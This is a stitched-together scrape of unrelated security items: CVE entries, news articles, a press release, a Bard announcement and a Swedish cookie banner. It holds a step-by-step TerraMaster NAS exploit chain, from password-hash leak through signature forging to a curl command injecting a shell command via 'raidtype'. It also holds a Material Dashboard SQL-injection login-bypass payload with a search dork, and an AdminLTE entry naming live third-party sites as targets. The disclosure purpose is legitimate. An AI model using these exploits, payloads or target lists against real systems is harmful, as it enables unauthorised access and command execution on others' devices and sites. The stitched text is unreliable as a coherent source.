Directory Traversal vulnerability in AdminLTE 3.1.0 allows remote attackers to gain escalated privilege and view sensitive information via /admin/index2.html, /admin/index3.html URIs.

This gist text file is reserved for CVE-2021-36471 which is yet to be published. Following are the description and references for the assigned CVE so that Mitre team can assess.

Vulnerability Type :

Directory Traversal

Affected Component :

Privilege escalation, compromise of admin account

Attack Type :

Remote

Impact Escalation of Privileges :

True

Impact Information Disclosure :

True

Attack Vectors :

Traverse to /admin/index2.html , /admin/index3.html

Discoverer :

https://www.linkedin.com/in/cyb3rs4k1/

References :

https://wpkixx.com/html/admo-admin/index2.html

http://baituljannah.sch.id/assets/admin/index2.html

https://marix.live/admin/index2.html

http://infobanjir.plsm.water.gov.my/admin/index3.html

https://doevent.uz/admin/index2.html?attempt=1

https://p2p.wrox.com/sharepoint-admin/index2.html

Vendor of Product :

AdminLTE

Affected Product Code Base :

AdminLTE Bootstrap Admin Dashboard Template AdminLTE 3.1.0

Description :

This vulnerability can be searched by using the google dork 'inurl:"/admin/index2.html"' or 'inurl:"/admin/index3.html"' (without single quotes).

AdminLTE dashboards have index2.html/index3.html in their products. Using this we can search for the AdminLTE templates which are being used in websites.

Google will list out websites provided with public facing AdminLTE dashboards which are accessible over the internet.

Reference URLs for the few affected websites with the adminLTE template are listed in references above.

CVE-2021-36471: This gist text file is reserved for CVE-2021-36471 which is yet to be published. Following are the description and references for the assigned CVE so that Mitre team can assess.

A broken access control vulnerability could have led to dangerous follow-on attacks for users of the money-management app.

A finance app called "Money Lover" has been found leaking user transactions and their associated metadata, including wallet names and email addresses.

That’s according to Trustwave, which published its findings in a blog post on Feb. 7.

Money Lover, developed by Vietnam-based Finsify, is a tool for managing personal finances — budgeting, tracking expenses, and so on. It’s available in Google Play for Android, the Microsoft Store for PCs, and the App Store for iOS, where it enjoys a 4.6-star rating from more than 1,000 reviewers, who may or may not have been affected by the vulnerability.

Though the app leaked no actual bank account or credit card details, "the potential danger to their customers’ accounts will surely affect both the financial vendor and customer monetarily," wrote Karl Sigler, a senior security research manager at Trustwave. "And when you have a financial institution that loses a customer's trust, they will likely see a reputation hit."

**The Money Lover Bug**

Troy Driver, a Trustwave security researcher and Money Lover user, became curious about Money Lover's security. So, using its Web interface, he routed its traffic through a proxy server, where he discovered a problem: From the Web sockets tab of his browser’s developer tools window, he could see the email addresses, wallet names, and live transaction data associated with every one of the app's shared wallets (wallets managed by two or more users).

It was a classic case of broken access controls, where he — an otherwise authorized user — was able to view data that should have been kept outside of his permissions.

"Based on the small amount of information in the blog," Stephen Gates, security evangelist at Checkmarx, speculates to Dark Reading, "I would suspect that an API in use has an API1, API2, and/or API3 vulnerability,” aka broken object level authorization, broken user authentication, and excessive data exposure, respectively (all forms of broken access control).

Such vulnerabilities are extremely common. Every few years or so, the Open Web Application Security Project (WASP) releases a Top 10 list, using extensive testing and surveys of industry professionals to track the most common web security vulnerabilities. In its latest 2021 iteration, broken access controls made the No. 1 spot on the list.

Broken access isn’t just prevalent, though — it’s dangerous. "If the app has one or more of the above vulnerabilities," Gates adds, "it’s just a matter of time before attackers craft the perfect request to possibly gain access to even more data."

**The Implications of the Bug**

While the sensitive data in this case isn't all that sensitive (i.e., not payment card details or credentials), users would be advised not to pooh-pooh cases like this, as they can lead to more pointed attacks further down the line. For example, cross-referencing email addresses with past leaks could potentially lead to account takeover or impersonation.

Even the basic metadata leaked by Money Lover could be something to go on, for hackers that like to use every part of the animal, as it were.

"For instance," Sigler explains, "a scenario could occur where an attacker reaches out to one of the users sharing a wallet via email and suggests that funds aren't seen in a specific shared wallet name and transaction ID. The attacker could then recommend the person transfer money to a different account or maybe log in to 'check' the transaction but provide a link to a credential capture webpage."

Sigler puts it bluntly: "There is no reason for any Money Lover user to be able to see the transactions of any other user. Tightening up permission to just authorized users is an important security control."

As of Jan. 27, the Money Lover app patched the vulnerability; users should update their apps to the latest version.

'Money Lover' Finance App Exposes User Data

Integer overflow in Core in Google Chrome prior to 110.0.5481.77 allowed a remote attacker who had one a race condition to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low)

CVE-2023-0705: Stable Channel Update for Desktop

TerraMaster NAS 4.2.29 and earlier allows remote attackers to discover the administrative password by sending "User-Agent: TNAS" to module/api.php?mobile/webNasIPS and then reading the PWD field in the response.

**Introduction**

This report explains how researchers at Octagon Networks were able to chain two interesting vulnerabilities to achieve unauthenticated remote command execution as root on TerraMaster NAS devices running TOS version 4.2.29. Patches are distributed for 4.2.31 now.

**Analyzing the PHP files**

After downloading the installation package of the latest TOS package from the official download site and extracting it using binwalk, we can see the platform uses nginx server with PHP scripts. The PHP scripts are encrypted on disk. After decrypting them and analyzing their content, there is an interesting php script – /usr/www/module/api.php.

The script starts parsing the uri components in the following manner.

$in = router(); 
$URI = $in\['URLremote'\]; 
if (!isset($URI\[0\]) || $URI\[0\] == '') 
  $URI\[0\] = $default\_controller; 
if (!isset($URI\[1\]) || $URI\[1\] == '') 
  $URI\[1\] = $default\_action; 

define('Module', $URI\[0\]); 
define('Action', $URI\[1\]); 
$class = Module; 
$function = Action;

The router function parses the get parameters and assigns them in such a way that if the request is http://target/module/api.php?XXXX/YYYY, then $class will be XXXX, and $function is YYYY.

It then checks if the function is in an array of NO_LOGIN_CHECK, and if it’s not, it sets REQUEST MODE to 1. This will be important detail for the exploit later.

$GLOBALS\['NO\_LOGIN\_CHECK'\] = array(
      "webNasIPS", 
      "getDiskList", 
      "createRaid", 
      "getInstallStat", 
      "getIsConfigAdmin", 
      "setAdminConfig", 
      "isConnected"
); 
if (!in\_array($function, $GLOBALS\['NO\_LOGIN\_CHECK'\])) { 
      define('REQUEST\_MODE', 1); 
} else { 
      define('REQUEST\_MODE', 0); 
}

It then instantiates the class stated by $class and calls the method stated by $function.

$instance = new $class(); 
if (!in\_array($function, $class::$notHeader)) { 
 #防止请求重放验证... 
 if (tos\_encrypt\_str($\_SERVER\['HTTP\_TIMESTAMP'\]) != $\_SERVER\['HTTP\_SIGNATURE'\] || $\_SERVER\['REQUEST\_TIME'\] - $\_SERVER\['HTTP\_TIMESTAMP'\] > 300) { 
   $instance->output("Illegal request, timeout!", 0); 
 } 
} $instance->$function();

One thing to notice here is that the line if (!in_array($function, $class::$notHeader)) {. If our function is not in an array by the name of $notHeadeer, then a check will be made. It takes the TIMESTAMP http header and passes it to a function called tos_encrypt_str, and compares the output of the function to the value in SIGNATURE http header. It then checks if the timestamp is not older than 5 minutes. The tos_encrypt_str is a custom hashing function, which we will come to analyze later to figure out how SIGNATURE is created.

Looking for php scripts which have classes which can be invoked this way, I came across /usr/www/include/class/mobile.class.php. To start off, it has two arrays of method name, $notCheck and $notHeader.

static $notCheck = \[ 
        "webNasIPS", "getDiskList", "createRaid", "getInstallStat", 
        "getIsConfigAdmin",  "setAdminConfig", "isConnected", 'createid', 
        'user\_create',  'user\_bond', 'user\_release', 'login', 
        'logout', 'checkCode', "wapNasIPS" 
\]; 
//不验证头信息是否匹配... 
static $notHeader = \[
        "fileDownload", "videoPlay", "imagesThumb", 
        "imagesView", "fileUpload", "tempClear", 
        "wapNasIPS", "webNasIPS", "isConnected"
\];

Then it makes three check in its constructor.

if (!in\_array(Action, self::$notHeader)) { 
    if (!strstr($\_SERVER\['HTTP\_USER\_AGENT'\], "TNAS") || !isset($\_SERVER\['HTTP\_AUTHORIZATION'\]) || $this->REQUESTCODE != $\_SERVER\['HTTP\_AUTHORIZATION'\]) { 
        $this->output("Illegal request, please use genuine software!", false); 
    } 
}

The first check ensures that if the method name invoked is not in $notHeader array, it tests whether the user-agent http header is ‘TNAS’ and AUTHORIZATION header is equal to $this->REQUESTCODE. Otherwise it exits with an error message. The AUTHORIZATION header will be important later on. For now, let’s proceed to the second check.

if (REQUEST\_MODE) {
   if (!isset($\_SESSION)) { 
     $this->output("session write error!", false); 
   } else { 
     $this->user = &$\_SESSION\['kod\_user'\]; 
   } 
   if (isset($this->in\['PHPSESSID'\])) { 
     $this->sessionid = $this->in\['PHPSESSID'\]; 
   }
}

if REQUEST_MODE is set, then it checks whether the user is logged in. Otherwise it will exit. And the final check:

if (!in\_array(Action, self::$notCheck)) { 
     if (!$this->loginCheck()) { 
          $this->output("login is timeout", 0); 
     } 
}

It checks whether the method name is in $notCheck, and exits with an error if it’s not.

**Severe Information Leak: CVE-2022-24990**

So, with the knowledge of the two php script chains, we know that the seven functions “webNasIPS”, “getDiskList”, “createRaid”, “getInstallStat”, “getIsConfigAdmin”, “setAdminConfig”, “isConnected” are in NO_LOGIN_CHECK array in api.php, and will set REQUEST_MODE to 0, passing one of the checks in mobile.class.php. And upon further checking these functions, webNasIPS is the only function which is both in $notCheck and $notHeader arrays of mobile.class.php‘s constructor, which effectively can pass two remaining checks. Let’s call webNasIPS and see what it returns.

$ curl -vk 'http://XXXX/module/api.php?mobile/webNasIPS' -H 'User-Agent: TNAS' \* Trying XXXX... \* Connected to 127.0.0.1 (127.0.0.1) port 22056 (#0) 
> GET /module/api.php?mobile/webNasIPS HTTP/1.1 
> Host: 127.0.0.1:22056 
> User-Agent: TNAS < HTTP/1.1 200 OK < Date: Mon, 10 Jan 2022 14:10:40 GMT < Content-Type: application/json; charset=utf-8 < Transfer-Encoding: chunked < Connection: keep-alive < X-Powered-By: TerraMaster \* Connection #0 to host 127.0.0.1 left intact {"code":true,"msg":"webNasIPS successful","data":"NOTIFY Message\\nIFC:10.0.2.2\\nADDR:525400123456\\nPWD:$1$2kc1Zqe8$gighkBlDDDFHpG3RkZtws1\\nSAT:1\\nDAT:\[{\\"hostname\\":\\"ubuntu1604-aarch64\\",\\"firmware\\":\\"TOS3\_A1.0\_4.2.17\\",\\"sn\\":\\"\\",\\"version\\":\\"2110301418\\"},{\\"network\\":\\"eth0\\",\\"ip\\":\\"10.0.2.15\\",\\"mask\\":\\"255.255.255.0\\",\\"mac\\":\\"52:54:00:12:34:56\\"},{\\"service\\":\[{\\"name\\":\\"http\_ssl\\",\\"url\\":\\"\\",\\"port\\":\\"5443\\"},{\\"name\\":\\"http\\",\\"url\\":\\"XXXX\\",\\"port\\":\\"8181\\"},{\\"name\\":\\"sys\\",\\"url\\":\\"XXXX\\",\\"port\\":\\"8181\\"},{\\"name\\":\\"channel\\",\\"url\\":\\"\\",\\"port\\":0},{\\"name\\":\\"pt\\",\\"url\\":\\"\\",\\"port\\":0},{\\"name\\":\\"ftp\\",\\"url\\":\\"\\",\\"port\\":21},{\\"name\\":\\"web\_dav\\",\\"url\\":\\"\\",\\"port\\":0},{\\"name\\":\\"smb\\",\\"url\\":\\"\\",\\"port\\":0}\]}\]","time":2.920037031173706}

It returns a lot of interesting data. Let’s look at the function webNasIPS

function webNasIPS() { 
    if (strstr($\_SERVER\['HTTP\_USER\_AGENT'\], "TNAS")) { 
        $core = new core(); 
        $dataSheet\[0\] = \[ 
            "hostname" => $core->\_hostname(), 
            "firmware" => $core->\_version(), 
            "sn" => $core->\_system\_product\_name(), 
            "version" => $core->\_VersionNumber() 
        \]; 
        $defaultgw = $core->\_default\_RJ45(); 
        $eth = $core->\_netlist($defaultgw); 
        $dataSheet\[1\] = array(
            "network" => $defaultgw, 
            "ip" => $eth\['ip'\], 
            "mask" => $eth\['mask'\], 
            "mac" => $eth\['mac'\]
        ); 
        $dataSheet\[2\] = array("service" => $this->\_getservicelist()); 
        $ifc = $\_SERVER\['REMOTE\_ADDR'\]; 
        $addr = preg\_replace("/\[:\\n\\r\]+/", "", file\_get\_contents("/sys/class/net/eth0/address")); 
        $pwd = $this->REQUESTCODE; 
        if (!file\_exists("/tmp/databack/complete")) { 
            $sat = -1; 
        } else if (!empty($this->\_exec("df-json | awk '/\\/mnt\\/md/'"))) { 
            $sat = !file\_exists(USER\_SYSTEM . '/install.lock') ? 2 : 1; 
        } else { 
            $sat = 0; 
        } $dat = addslashes(json\_encode($dataSheet)); 
        $tpl = "NOTIFY Message\\\\nIFC:$ifc\\\\nADDR:$addr\\\\nPWD:$pwd\\\\nSAT:$sat\\\\nDAT:$dat"; 
        $this->output("webNasIPS successful", true, $tpl); 
    } 
    $this->output("webNasIPS failed", false, ""); 
}

It returns the TOS firmware version, the default gateway interface’s IP and mac address, running services with their binding address and their ports, and a variable $pwd which contains the value of $this->REQUESTCODE. Upon checking the origins of REQUESTCODE, we see that it is set in application.class.php

The _getpasswordfunctions essentially tells that REQUESTCODE is the hash of the admin password. This makes the above information leak a very dire one.

**Finding an OS command injection: CVE-2022-24989**

If we remember earlier, one of the checks in mobile.class.php is:

if (!in\_array(Action, self::$notHeader)) { 
    if (!strstr($\_SERVER\['HTTP\_USER\_AGENT'\], "TNAS") || !isset($\_SERVER\['HTTP\_AUTHORIZATION'\]) || $this->REQUESTCODE != $\_SERVER\['HTTP\_AUTHORIZATION'\]) { 
        $this->output("Illegal request, please use genuine software!", false); 
    } 
}

Since  webNasIPS gives us REQUESTCODE without authentication, we can now call from the seven functions we listed which are in NOT_LOGIN_CHECKand in $notCheck array, but NOT in $notHeader arrary. createRaid is one of the functions which fullfills this.

function createRaid() { 
    $vol = new volume(); 
    if (!isset($this->in\['raidtype'\]) || !isset($this->in\['diskstring'\])){ 
        $this->output("Incomplete parameters", false); 
    } 
    $ret = $vol->volume\_make\_from\_disks($this->in\['raidtype'\], $filesystem, $disks, $volume\_size); 
}

createRaid takes two POST parameters by raidtype and diskstring and calls $vol->volume_make_from_disks with the value of raidtype as the first parameter. Let’s have a closer look at volume_make_from_disks defined in volume.class.php.

function volume\_make\_from\_disks($level, $fs, $disks, $volume\_size) { 
    $this->fun->\_backexec("$\_makemd -s{$volume\_size} -l{$level} -b -t{$fs} {$diskItems} &"); 
}

It takes the first parameter and inserts it into a string to call another function $this->fun->_backexec. _backexec is a function defined in func.class.php.

function \_backexec($command) { 
     if (strstr($command, "regcloud")) { 
          @system("killall -9 regcloud"); 
     } 
     $fp = popen($command, "w"); 
     if ($fp == FALSE) return FALSE; 
     pclose($fp); 
     return TRUE; 
}

_backexec function passes the parameters it receives to popen without any sanitization. Therefore, it’s vulnerable to OS command injection.

**Bypassing Timestamp header checks**

We have now chained the information leak (admin password hash) with an OS injection vulnerability. But we have to return to api.php timestamp header check that we said we will look at later.

$instance = new $class(); 
if (!in\_array($function, $class::$notHeader)) { 
    #防止请求重放验证... 
    if (tos\_encrypt\_str($\_SERVER\['HTTP\_TIMESTAMP'\]) != $\_SERVER\['HTTP\_SIGNATURE'\] || $\_SERVER\['REQUEST\_TIME'\] - $\_SERVER\['HTTP\_TIMESTAMP'\] > 300) { 
        $instance->output("Illegal request, timeout!", 0); 
    } 
} 
$instance->$function();

api.php ensures that if the method name is not in the class’s $notHeader array, it will check that the TIMESTAMP header is not older than 300 seconds (5 minutes), and the SIGNATURE header has to be equal to the output of tos_encrypt_str function call on the TIMESTAMP value. Now, we have three problems.

*   We have to get the time of the machine
*   We have to know how tos_encrypt_str is invoked, and call it with arbitrary value
*   We have to calculate the right TIMESTAMP in epoch time from the machine’s time regardless of time difference

Let’s start with tos\_encrypt\_str.

**Figuring out the custom hash function**

Upon searching tos_encrypt_str, we realize that it’s not defined in the PHP scripts. And after a google search, we realize that it’s not also in the default and common list of php extentions. This leads us to the conclusion that it’s a function in one of TerraMaster’s custom PHP extenstions. Listing the loaded PHP extensions:

$ php -m 
... 
pgsql 
Phar 
php\_terra\_master 
posix 
redis 
...

The extension php_terra_master.so sticks out. It exports one function, tos_encrypt_str.

$ php -r 'var\_dump((new ReflectionExtension("php\_terra\_master"))->getFunctions());' 
 array(1) { 
    \["tos\_encrypt\_str"\] => object(ReflectionFunction)
 #2 (1) { 
    \["name"\]=> string(15) "tos\_encrypt\_str" 
}}

Calling tos_encrypt_str will tell us that it returns a hash.

$ php php -r 'echo tos\_encrypt\_str("XXXX") . PHP\_EOL;' 
6873abbd2da7dca265b78e64ead3729b

Opening the shared object in IDA, and searching for the string tos_encrypt_str, we find out that the hashing function is sub_3738.

result = zend\_parse\_parameters(v3, “s”, &v8, &v10); 
if ( (\_DWORD)result != -1 ) { 
   v5 = (const char \*)sub\_3694(&v9); 
   php\_sprintf(v11, “%s%s”, v5, v8); 
   v6 = (const char \*)sub\_2348(v11); 
   v7 = zend\_strpprintf(0LL, “%s”, v6);

It takes our string to be hashed from zend_parse_parameters, and passes it to php_sprintf (using variable v8). Before the php\_sprintf call, there is a function call sub_3694, whose return value is given to the php\_sprintf call as parameter, with our string. Let’s take a look at it.

\_\_int64 \_\_fastcall sub\_3694(\_\_int64 a1) { 
    int v2; 
    // w21 const char \*v3; 
    // x0 char v5\[40\]; 
    // \[xsp+38h\] \[xbp+38h\] 
    BYREF v2 = socket(2, 1, 0); 
    if ( (v2 & 0x80000000) != 0 ) { 
        v3 = "socket"; 
        LABEL\_5: perror(v3); 
        return 0LL; 
    } 
    strcpy(v5, "eth0"); 
    if ( (ioctl(v2, 0x8927uLL, v5) & 0x80000000) != 0 ) { 
        v3 = "ioctl"; 
        goto LABEL\_5; 
    } 
    php\_sprintf(a1, "%02x%02x%02x", (unsigned \_\_int8)v5\[21\], (unsigned \_\_int8)v5\[22\], (unsigned \_\_int8)v5\[23\]); 
    return a1; 
}

This function gets the mac address of the interface eth0 and returns the last 3 bytes (device specific part) in hex. Then the php_sprintf in sub\_3738 call formats it with our string to a final string to give it to sub_2348. Therefore, if the mac address of eth0 for a device is _55:44:33:12:34:56_ and our string to be hashed is _XXXX_, then the final string given to the actuall hash function (sub\_2348) will be _123456XXXX_.

**Getting the later half of the mac**

tos_encrypt_str using the later half of the mac address of eth0 allows each TerraMaster device to derive different hashes for the same string. This prevents us from calling the function with arbitrary stirng, since we need the mac address.

Lucky for us, webNasIPS, which leaks the admin password hash, also gives us the mac address of the default gateway interface, which is often eth0. Armed with the later half of the mac address, we can write a small hook to call tos\_encrypt\_str with any string value we want to generate the hash.

function webNasIPS() { 
   $dataSheet\[1\] = array(
       "network" => $defaultgw, 
       "ip" => $eth\['ip'\], 
       "mask" => $eth\['mask'\], 
       "mac" => $eth\['mac'
   \]); 
}

**Another information leak: time of the machine**

Now that we can generate the right hash for any arbitrary string for any TerraMaster device, the only remaining piece is the timestamp value. On some TerraMaster TOS devices, there is a Date header that tells us what timezone the target machine is synched to, so we can sync our time with the victim and have an accurate timestamp. However, on TerraMaster devices, it is hardened and the Date header is stripped so it is not easy for us to figure out what timezone the machine is synched to.

Upon replaying with the request, we realize that sending a request to any of these functions in a way that the result is a failure will yield the time of the machine being leaked. Here is a simple request to call createRaid with no AUTHORIZATION, TIMESTAMP and SIGNATURE headers.

$ curl -k 'http://127.0.0.1:22056/module/api.php?mobile/createRaid' | jq -r 
{ 
 "code": false, 
 "msg": "Illegal request, please use genuine software!", 
 "data": \[\], 
 "time": 0.00028896331787109375, 
 "ctime": "2022-01-10 23:00:38" 
}

In the request, there is a value of ctime, which contains the date of the machine with the 24 hour format.

Now, with all the pieces on our hand, the only remaining task is to calculate the timestamp in epoch regardless of the machine’s timezone.

**Calculating the timestamp**

To do this, we can use any unix timestamp calculator. These are the steps to do that.

*   We take the time of the machine from the ctime and convert it to epoch time
*   We calculate our own time (both formal and epoch) (for example: using PHP’s date functionality: php -r 'echo time() . " " . date("Y-m-d H:i:s") . PHP_EOL; ')
*   We subtract the epoch time of our machine from the target machine
*   We convert the subtraction result of the above calculation into relative time
*   We add/subtract the relative time to our machine’s formal time
*   We convert the result from the above calculation to epoch time
*   We now have the right epoch time. We calculate the hash of this epoch time using the machine’s later half of the mac
*   We invoke createRaid with our payload in raidtype

**Exploitation**

The final payload will look something like this.

$ curl -vk 'http://XXXX/module/api.php?mobile/createRaid' -H 'User-Agent: TNAS' -H 'AUTHORIZATION: $1$2kc1Zqe8$gi6hkBlDDDFHpG3RkZtws1' -d 'raidtype=;id>/tmp/a.txt;&amp;diskstring=XXXX' -H 'TIMESTAMP: 1642335373' -H 'SIGNATURE: 473a6d90ede9392eebd8a7995a0471fe' | jq -r

CVE-2022-24990: CVE-2022-24990: TerraMaster TOS unauthenticated remote command execution via PHP Object Instantiation – Blog

A vulnerability classified as critical has been found in weblabyrinth 0.3.1. This affects the function Labyrinth of the file labyrinth.inc.php. The manipulation leads to sql injection. Upgrading to version 0.3.2 is able to address this issue. The name of the patch is 60793fd8c8c4759596d3510641e96ea40e7f60e9. It is recommended to upgrade the affected component. The identifier VDB-220221 was assigned to this vulnerability.

@@ -45,11 +45,12 @@ public function Labyrinth($ip,$useragent){

global $config;

mt\_srand(Labyrinth::MakeSeed());

  

$this\->crawler\_ip = $ip;

$this\->crawler\_useragent = $useragent;

  

$this\->dbhandle = new SQLiteDatabase($config\['tracking\_db'\]);

$this\->crawler\_info = $this\->dbhandle\->query("SELECT crawler\_ip FROM crawlers WHERE crawler\_ip='$ip' AND crawler\_useragent='$useragent'");

  

$this\->crawler\_ip = sqlite\_escape\_string($ip);

$this\->crawler\_useragent = sqlite\_escape\_string($useragent);

  

$this\->crawler\_info = $this\->dbhandle\->query("SELECT crawler\_ip FROM crawlers WHERE crawler\_ip='$this\->ip' AND crawler\_useragent='$this\->useragent'");

}

  

function CheckForSearchEngines(){

CVE-2011-10002: Fixed SQLi bug described in https://code.google.com/p/weblabyrinth/is… · rotelok/weblabyrinth@60793fd

**WESTMINSTER, Colo.****,** **Feb. 7, 2023** **/PRNewswire/ --** Global cybersecurity pioneer Coalfire announced today major innovations to its Compliance Essentials solution, including advanced automated evidence collection plug-ins, enabling faster time to compliance and greater visibility for clients. In partnership with anecdotes, one of the world's leading security technology engineering firms, Compliance Essentials now enables customers to manage compliance workflows and risks, automatically collect evidence, and execute audits all within the platform – making it one of the most comprehensive compliance and risk management automation solutions in the market.

Introduced in 2022, Compliance Essentials is the next-generation compliance management solution that bundles audit services with its leading Software-as-a-Service (SaaS) compliance platform. Compliance Essentials' newly enhanced automation capabilities enable clients to reduce manual evidence collection by up to 50% and cut internal compliance costs by up to 40%.

"We have true continuous compliance with this solution," said Prabhath Karanth, global head of security & trust at TripActions. "Having anecdotes' automation within Compliance Essentials allows organizations to identify control effectiveness and demonstrate to both leadership and customers the status of our maturing security program."

"The transformation to continuous compliance takes a giant step forward with evidence automation seamlessly integrated into our solution," said Coalfire Chief Product Officer Vineet Seth, who was recently named to anecdotes' advisory board. "Working with the elite anecdotes engineering team, Coalfire Compliance Essentials now pulls evidence automatically from 35+ plug-ins spanning all cloud service providers, including AWS, Azure, and Google Cloud, and maps with more than 40 regulatory frameworks."

"We are excited to unveil a game-changing solution for compliance management from Coalfire with this union of exceptional service and technology providers," said anecdotes CEO Yair Kuznitsov. "The partnership promises to revolutionize how compliance teams operate, bringing a brighter future for compliance programs and setting a new standard in the industry."

In addition to enhanced automation features, Coalfire is also introducing a new risk management module within Compliance Essentials that centralizes an organization's risk management program. The module enables customized risk scoring with robust workflows, empowering organizations to track, manage, and address risks.

Seth added, "Our breakthrough compliance automation solution sets a new standard for organizations with complex environments and multiple compliance frameworks on the path to continuous, automated compliance."

**About Coalfire**

The world's leading organizations – including the top five cloud service providers and leaders in financial services, healthcare, and retail – trust Coalfire to elevate their cyber programs and secure the future of their business. Number one in compliance, FedRAMP®, and cloud penetration testing, Coalfire is the world's largest firm dedicated to cybersecurity, providing unparalleled technology-enabled professional and managed services. To learn more, visit Coalfire.com.

**About anecdotes**

anecdotes is the leading technology provider for Compliance leaders. Powered by data, the anecdotes Compliance Operating System (OS) transforms security Compliance from a box-ticking exercise into a powerful driver of growth. With a variety of applications powered by verified data, Compliance leaders as well as advisory firms and auditors, can turn manual, time-consuming, and siloed tasks into an automated, continuous, and strategic Compliance program. That's why some of the world's fastest growing brands - Unity, TripActions, Amplitude, Babylon and more - use anecdotes. For more information, visit anecdotes.ai.

Coalfire Compliance Essentials Optimized for Automated Evidence Collection

By Habiba Rashid
Google's CEO, Sundar Pichai, described the ChatGPT rival, Bard, as an "experimental conversational AI service" powered by LaMDA.
This is a post from HackRead.com Read the original post: Google Introduces Bard: New ChatGPT Rival

For now, Bard is only available to “trusted testers”; however, Google intends to make it more widely available to the public in the coming weeks.

ChatGPT’s sensational popularity, which has been growing ever since its launch last November, seems to have finally affected Google, seeing as it has announced its very own **ChatGPT** alternative and rival named Bard.

Google’s CEO, Sundar Pichai, officially announced the project in a blog post on Monday, describing the tool as an experimental conversational AI service, designed to engage in conversations with users while answering their queries. 

Despite not revealing many details about Bard’s capabilities, it seems apparent that the chatbot will have free-ranging characteristics similar to those of **OpenAI’s ChatGPT**.

“Bard seeks to combine the breadth of the world’s knowledge with the power, intelligence and creativity of our large language models. It draws on information from the web to provide fresh, high-quality responses.

Bard can be an outlet for creativity, and a launchpad for curiosity, helping you to explain new discoveries from **NASA’s James Webb Space Telescope** to a 9-year-old, or learn more about the best strikers in football right now, and then get drills to build your skills,” writes Pichai. 

However, a significant difference is that, unlike ChatGPT, which can only access information up to 2021 and does not have access to the web, Bard is powered by Google’s Language Model for Dialog Applications (**LaMDA**) and will draw on all the information from the web to curate responses. 

Image: Google

Bard has been opened up to trusted testers, and according to Google’s **blog post**, the technology and search engine giant intends to make it “more widely available to the public in the coming weeks.” 

Although Google promises to “combine external feedback with our own internal testing to make sure Bard’s responses meet a high bar for quality, safety and groundedness in real-world information,” it is likely that Bard will face limitations similar to those faced by ChatGPT since both are built on text generation software. 

Besides being prone to providing fabricated information, AI models trained on text scraped online are susceptible to exhibiting racial and gender biases and repeating hateful language.

Along with Google’s AI image generator, Imagen, and its AI music generator, MusicLM, Bard has also been added to a list of advanced AI services that have yet to be released to the public.

1.  **Fields of application of artificial intelligence**
2.  **AI-based Model to Predict Extreme Wildfire Danger**
3.  **How Artificial intelligence (AI) Stops Cybercriminals**
4.  **Microsoft patent reveals chatbot to talk to dead people**
5.  **AI-Powered Glasses Give Deaf People Power of Speech**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Google Introduces Bard: New ChatGPT Rival

Material Dashboard version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Material Dashboard 2 Auth by pass Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://www.creative-tim.com/                                                                                      |  | # Dork      : "Material Dashboard 2 by Creative Tim"                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use Payload = user : 'or''='@gmail.com & pass : 'or''='[+] http://127.0.0.1/kacatalystcom/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

Material Dashboard 2 SQL Injection

Plan to create boundary between JavaScript objects and their blueprints gathers momentum

Plan to create boundary between JavaScript objects and their blueprints gathers momentum

Software engineers at Google have put forward a proposal that promises to clamp down on prototype pollution, a class of vulnerability that has become a scourge of web security.

Prototype pollution is a JavaScript language flaw that allows attackers to manipulate objects they don’t control or don’t have access to at runtime. The problem arises from the lack of a clear boundary between objects (which are used to hold data at runtime) and their blueprints (which determine how those objects should behave).

BACKGROUND Prototype pollution: The dangerous, underrated bug impacting JavaScript applications

The Google-backed proposal – which has been submitted for ratification to TC39, a technical working group – aims to create a boundary between JavaScript objects and blueprints. The technology works by “removing the pathways that allow attackers to jump from objects to blueprints”.

Technical details of the proposal have been posted on GitHub.

**Opt-in secure mode**

As explained in the GitHub post, the “proposal seeks to mitigate prototype pollution by introducing an opt-in secure mode that makes prototypes impossible to access using string property keys, instead requiring they be accessed with methods (Object.getPrototypeOf) or the proposed new symbol property keys”.

Santiago Diaz, co-author of the proposal, told The Daily Swig: “The goal is to break known exploit techniques, while being as compatible as possible with existing codebases, so that the mitigation can be adopted widely on the internet.”

TC39, a working group responsible for maintaining the JavaScript specification, last week gave the green light to proceed from stage 0 to stage 1, beginning the next phase in its five-part journey towards ratification.

Diaz explained: “The significance of this is that TC39 sees pollution as a problem worth looking into (and hopefully solving). Over the course of the next months, we’ll be iterating on the specific aspects of the proposal and doing the engineering to find the right balance of trade-offs and hopefully make it palatable both for TC39 members and for developers to adopt.”

Once a proposal reaches the final stage (stage 4), the proposal is deemed final and browser vendors can make changes in their software. “This in turn, signals \[to\] developers to start adopting this new mitigation and roll it out to production,” Diaz concluded.

**Symbol solution**

Gareth Hayes, a security researcher at PortSwigger, the parent company of The Daily Swig, expressed interest in the proposals.

“This is a proposal to prevent prototype pollution by giving the developer the ability to remove properties like \_\_proto\_\_ by executing some code that enables a secure mode and removes these properties,” Hayes said.

“They propose using symbols to enable the site to continue to use \_\_proto\_\_ functionality so a site doesn’t break and an attacker couldn’t supply these symbols as it would require JavaScript execution.”

The Google proposal is not the first of its kind. However, existing solutions for preventing unintentional changes to prototypes like Object.freeze, preventExtensions, and seal have a number of “downsides that make them difficult to deploy”, according to Google’s blog post, which outlines these drawbacks.

RELATED Prototype pollution-like bug variant discovered in Python

Google engineers plot to mitigate prototype pollution

Softr v2.0 was discovered to contain a HTML injection vulnerability via the Work Space Name parameter.

Vi använder cookies och data för att

*   leverera och underhålla Googles tjänster
*   spåra avbrott och skydda mot spam, bedrägeri och otillåten användning
*   mäta målgruppsengagemang och webbplatsstatistik så att vi kan analysera hur våra tjänster används och förbättra tjänsternas kvalitet.

Om du väljer knappen Godkänn alla använder vi även cookies och data för att

*   utveckla och förbättra nya tjänster
*   leverera annonser och mäta hur effektiva de är
*   visa anpassat innehåll utifrån dina inställningar
*   visa anpassade annonser utifrån dina inställningar

Om du väljer knappen Avvisa alla använder vi inte cookies i dessa ytterligare syften.

